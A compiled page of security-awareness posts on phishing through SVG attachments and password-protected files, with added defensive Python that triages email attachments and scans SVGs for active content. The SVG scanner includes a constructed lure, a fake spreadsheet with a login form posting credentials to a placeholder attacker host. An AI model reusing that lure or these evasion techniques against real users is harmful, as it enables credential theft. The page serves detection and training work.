Phishing emails are increasingly using SVG (Scalable Vector Graphics) attachments to avoid detection by security software. SVG files can display graphics, HTML, and execute JavaScript, making them useful for phishing attacks. These attachments are often used to present phishing forms or to disguise themselves as official documents, tricking users into downloading malware. MalwareHunterTeam has reported a rise in the use of SVG files in phishing campaigns. Due to their textual nature (XML), SVG files often bypass security detection tools. Since SVG attachments are rare in legitimate emails, they should be treated cautiously unless expected.

This screenshot displays an altered SVG phishing sample (altered by NVISO) showing a "no-reply" Wikipedia email address. When a victim receives this SVG attachment, it includes their own email address. Upon opening, the SVG mimics a blurred Excel spreadsheet, with a green phishing form overlaid on top. The Wikipedia logo is fetched via a legitimate Clearbit logo service (through an HTTPS request to logo[.]clearbit[.]com, which can be detected). This entices the victim to enter their credentials to see the full spreadsheet. When the victim enters their password and clicks the "View Document" button, the credentials are sent to an attacker-controlled web server.

#phishing #security #detection #awareness
Risky attachment detection in emails
Summary
Risky-attachment-detection-in-emails refers to the process of identifying email attachments that could hide malware or phishing schemes, such as password-protected files or unusual formats like SVG graphics. These attachments often bypass traditional security measures and trick users into revealing sensitive information or downloading harmful software.
- Scrutinize attachments: Always review any unexpected attachment, especially if it’s a password-protected file or an unfamiliar format like SVG, and verify its legitimacy before opening.
- Enable specialized scanning: Make sure your email security tools are configured to scan password-protected files and analyze the content of less common attachments, such as SVGs.
- Educate your team: Regularly train colleagues to recognize warning signs of phishing attempts, including suspicious file types and emails that share passwords in the message body.
"How Attackers Are Using Password-Protected Files To Bypass Detection and How to Stop Them?"

In war, using the enemy's weapon against them is a powerful tactic! Cyber attackers apply this meticulously: using the same defenses meant to protect us to their advantage. It's like turning our shields into their secret weapon. In today's post, the "password-protected file" is that weapon.

Password-protected files are intended to share files securely with others. They can be documents, PDFs, ZIP files, etc. They simply prompt for a password when opened. But attackers intelligently use it as an attack vector to bypass detection. Let's see how...

Attack Flow:
1) Attacker creates & sends a password-protected malware file as an email attachment.
2) Security tools can't analyze it, as automated scanning fails (since the file is password-locked).
3) Victim opens the file that's disguised as a legit doc (often as an invoice).
4) Victim assumes that since it's a sensitive file it might have been password-protected. Notices the password mentioned in the same email body. Enters it.
5) Victim now opens the files inside > Ransomware or malware gets executed on the device.

Thus, attackers bypass the email/network gateway security and reach the device very cunningly. Instead of an attachment, a common trend these days is to use a password-protected Dropbox or Google Drive file link to achieve the same.

How can Security Analysts counter this?
--> Depending on your company requirements, consider blocking or quarantining emails with password-protected attachments. (With the current enterprise secure sharing options available, users should not be relying on password-protected files anyway.)
--> A few email security vendors do support scanning of password-protected files if the password is present in the mail body. Turn on these features for the SOC team's visibility.
--> To tackle these attacks, evaluate what dynamic preventative security controls at web browser and endpoint level are present, i.e. what controls do you have if the file redirects the user to a malicious site or attempts to install malware?
--> Educate the users about these scenarios. Tell them that password-protected files are suspicious. Tell them that if the password is listed in the same email, it's even more suspicious.

If you enjoyed this or learned something, follow me at Rohit Tamma for more in future! #ransomware #incidentresponse #cybersecurity #informationsecurity #cyberattack #threatdetection
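The "locked attachment plus password in the same mail" pattern from the post above can be turned into a simple gateway check. The following is an added example written for this page, not code from the post's author or from any vendor product: it sniffs attachments for the three common password-protected containers (ZIP encryption flag bit, PDF `/Encrypt` dictionary, OLE compound file carrying an `EncryptedPackage` stream as produced by password-protected Office documents), looks for a password handed over in the body, and escalates to quarantine when both are present. The message and the archive are constructed fixtures; the archive's payload is not really encrypted, only its header flag bits are patched so the detector sees what a real password-protected ZIP presents.

```python
"""Triage helper: flag password-protected attachments and a password handed over
in the same message body (the pattern described in the post above)."""
import io
import re
import zipfile
from email import policy
from email.message import EmailMessage
from email.parser import BytesParser

# "the password is X", "Password: X", "password = X" as typically written in the body
PASSWORD_RE = re.compile(r"(?i)\bpassword\b\s*(?:is|:|=)\s*[\"']?([^\s\"']{3,})")

# Password-protected OOXML (docx/xlsx/pptx) is an OLE compound file whose directory
# carries an "EncryptedPackage" stream; stream names are stored as UTF-16LE.
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"
OOXML_ENCRYPTED_STREAM = "EncryptedPackage".encode("utf-16-le")


def zip_is_encrypted(data):
    """True if any ZIP entry sets general-purpose flag bit 0 (ZipCrypto or AES)."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            return any(info.flag_bits & 0x1 for info in zf.infolist())
    except zipfile.BadZipFile:
        return False


def password_protection_reason(data):
    """Return why the attachment looks password-protected, or None if it does not."""
    if data.startswith(b"PK\x03\x04") and zip_is_encrypted(data):
        return "ZIP container with encrypted entries"
    if data.startswith(b"%PDF") and b"/Encrypt" in data:
        return "PDF with /Encrypt dictionary"
    if data.startswith(OLE_MAGIC) and OOXML_ENCRYPTED_STREAM in data:
        return "Office document with EncryptedPackage stream"
    return None


def find_disclosed_passwords(body):
    """All candidate passwords spelled out in the message text."""
    return PASSWORD_RE.findall(body)


def triage_message(raw):
    """Parse an RFC 5322 message and decide allow / review / quarantine."""
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    body_part = msg.get_body(preferencelist=("plain", "html"))
    body = body_part.get_content() if body_part is not None else ""
    locked = []
    for part in msg.iter_attachments():
        name = part.get_filename() or "<unnamed>"
        payload = part.get_payload(decode=True) or b""
        reason = password_protection_reason(payload)
        if reason:
            locked.append((name, reason))
    passwords = find_disclosed_passwords(body)
    if locked and passwords:
        verdict = "quarantine"   # locked attachment and its key in the same mail
    elif locked:
        verdict = "review"       # locked attachment, no key: still unscannable
    else:
        verdict = "allow"
    return {"attachments": locked, "disclosed_passwords": passwords, "verdict": verdict}


# ---- constructed fixtures (not real malware) --------------------------------

def make_flagged_zip(name, data):
    """Build a stored ZIP and set the encryption flag bit in both headers.
    The payload is NOT actually encrypted; only the flags are patched so the
    detector sees the same header bits a real password-protected archive has."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr(name, data)
    raw = bytearray(buf.getvalue())
    raw[6] |= 0x01                               # local file header flags (offset 6)
    raw[raw.find(b"PK\x01\x02") + 8] |= 0x01     # central directory flags (offset 8)
    return bytes(raw)


def build_sample_email():
    """Constructed message: locked 'invoice' plus the password in the body."""
    msg = EmailMessage()
    msg["From"] = "billing@example.invalid"
    msg["To"] = "user@example.invalid"
    msg["Subject"] = "Invoice 4471"
    msg.set_content("Please find the invoice attached. The password is Inv0ice-2024")
    msg.add_attachment(make_flagged_zip("invoice.docm", b"placeholder bytes"),
                       maintype="application", subtype="zip", filename="invoice.zip")
    return msg.as_bytes()


if __name__ == "__main__":
    print(triage_message(build_sample_email()))
```

The "review" verdict exists because a locked attachment without a visible password is still a blind spot for scanning, which matches the post's advice to block or quarantine such mail where company policy allows it. The password regex is deliberately loose; in a production hook it is the combination with an unscannable attachment, not the regex alone, that should drive the action.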
🚨 Phishing Alert: Threat Actors are Getting Creative with SVG Attachments! 🚨

Cybercriminals are constantly innovating to bypass detection, and their latest trick? Using SVG (Scalable Vector Graphics) attachments in phishing emails. Here's why this matters:

🌐 Traditional Images (JPG/PNG): These are pixel-based grids, easy to scan for malicious content.
🖌️ SVG Files: Instead of pixels, they use lines, shapes, and text defined by mathematical formulas. This makes them lightweight, scalable, and harder for traditional email filters to analyze effectively.

⚠️ How They're Exploited:
1️⃣ Embedding phishing forms directly in SVG files.
2️⃣ Using SVGs to deliver malicious payloads while avoiding detection.

🔒 What Can You Do?
✅ Be cautious of unexpected email attachments, especially SVG files.
✅ Train employees on identifying phishing attempts.
✅ Deploy advanced email security solutions that analyze SVG file content.

Phishing campaigns are evolving, and staying informed is your first line of defense! 💡 Have you encountered this technique? Share your thoughts and let's discuss how to combat it!

#CyberSecurity #PhishingAwareness #SVGFiles #ThreatIntel #StaySafeOnline
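Both SVG posts on this page (the NVISO-altered sample at the top and the alert above) come down to the same point: an SVG is XML, so "analyze SVG file content" means parsing it and looking for the things a picture should not contain. The following is an added example written for this page, not code from either post's author or from any product: it content-sniffs for SVG regardless of filename, then walks the XML tree and reports `<script>` elements, `on*` event handlers, `<foreignObject>` with embedded HTML form controls, `javascript:`/`data:` URLs, and every external host the file would contact (the logo fetch from logo.clearbit.com that the first post calls out as detectable, and the form's submission target). The sample SVG is constructed to mirror the described lure; its collection host is an obvious placeholder and its script block is inert.

```python
"""Static triage of an SVG attachment: surface the active content and outbound
requests that turn an 'image' into a phishing page."""
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# HTML elements that have no business inside an image but appear in phishing SVGs
HTML_ACTIVE_TAGS = {"form", "input", "button", "iframe", "object", "embed"}
URL_ATTRS = {"href", "src", "action", "data"}


def _local(name):
    """Strip an ElementTree namespace prefix: '{http://...}href' -> 'href'."""
    return name.rsplit("}", 1)[-1]


def looks_like_svg(data):
    """Content sniff independent of the filename or declared MIME type."""
    head = data.lstrip(b"\xef\xbb\xbf \t\r\n")[:1024].lower()
    return head.startswith(b"<svg") or (head.startswith(b"<?xml") and b"<svg" in head)


def triage_svg(data):
    """Return findings, the external hosts contacted, and a score (finding count)."""
    findings, hosts = [], set()
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return {"findings": ["unparseable XML: %s" % exc], "external_hosts": [], "score": 1}
    for el in root.iter():
        tag = _local(el.tag)
        if tag == "script":
            findings.append("<script> element")
        elif tag == "foreignObject":
            findings.append("<foreignObject> (HTML rendered inside the image)")
        elif tag in HTML_ACTIVE_TAGS:
            findings.append("HTML <%s> element" % tag)
        for attr, value in el.attrib.items():
            name = _local(attr)
            v = value.strip()
            if name.startswith("on"):                      # onload=, onclick=, ...
                findings.append("event handler %s= on <%s>" % (name, tag))
            if name in URL_ATTRS:
                if v.lower().startswith("javascript:"):
                    findings.append("javascript: URL in %s= on <%s>" % (name, tag))
                elif v.lower().startswith("data:"):
                    findings.append("data: URL in %s= on <%s>" % (name, tag))
                else:
                    parsed = urlparse(v)
                    if parsed.scheme in ("http", "https") and parsed.hostname:
                        hosts.add(parsed.hostname)
    if hosts:
        findings.append("outbound request(s) to: " + ", ".join(sorted(hosts)))
    return {"findings": findings, "external_hosts": sorted(hosts), "score": len(findings)}


# Constructed sample mirroring the described lure: a "spreadsheet" backdrop, a
# logo fetched from a third-party service, an HTML login form posting to a
# placeholder host, and an inert script block. Not a real campaign artifact.
PHISHING_SVG = b"""<?xml version="1.0" encoding="UTF-8"?>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
     width="800" height="600" onload="/* handler */">
  <rect width="800" height="600" fill="#e8f5e9"/>
  <image xlink:href="https://logo.clearbit.com/example.invalid" width="120" height="40"/>
  <foreignObject x="200" y="150" width="400" height="300">
    <form xmlns="http://www.w3.org/1999/xhtml" method="post"
          action="https://collector.attacker-placeholder.invalid/submit">
      <input type="email" name="user" value="victim@example.invalid"/>
      <input type="password" name="pass"/>
      <button type="submit">View Document</button>
    </form>
  </foreignObject>
  <script>/* credential-posting handler would live here */</script>
</svg>
"""

# Constructed benign sample: a plain vector drawing with no active content.
BENIGN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10">
  <circle cx="5" cy="5" r="4" fill="blue"/>
</svg>
"""

if __name__ == "__main__":
    for label, blob in (("lure", PHISHING_SVG), ("benign", BENIGN_SVG)):
        print(label, looks_like_svg(blob), triage_svg(blob))
```

Two caveats for anyone wiring this into a gateway. `xml.etree` is not hardened against entity-expansion attacks, so parse untrusted attachments with `defusedxml` or with a size and depth limit. And a static walk only sees what is in the clear: script hidden in CDATA, base64 inside a `data:` URL, or HTML assembled at runtime will show up only as the `<script>` or `data:` finding itself, which is one more reason the posts' simpler advice holds: SVG attachments are rare in legitimate mail, so any finding above zero is grounds to hold the message rather than try to prove it harmless.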